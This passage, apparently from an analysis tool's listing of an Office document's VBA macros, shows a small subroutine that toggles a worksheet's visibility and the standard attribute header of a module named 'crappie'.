73 | Sub sbHideASheet() | |
74 | Sheet2.Visible = False | Visible |
75 | 'OR You can mention the Sheet name | |
76 | Sheets("Sheet2").Visible = True | |
77 | End Sub |
Module: crappie |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "crappie" |
2 | Attribute VB_Base = "0{9AD81DE8-62E1-4795-AE66-E0FE682BA917}{5B5AFF87-D297-46C7-8183-E8213D3D5C4C}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |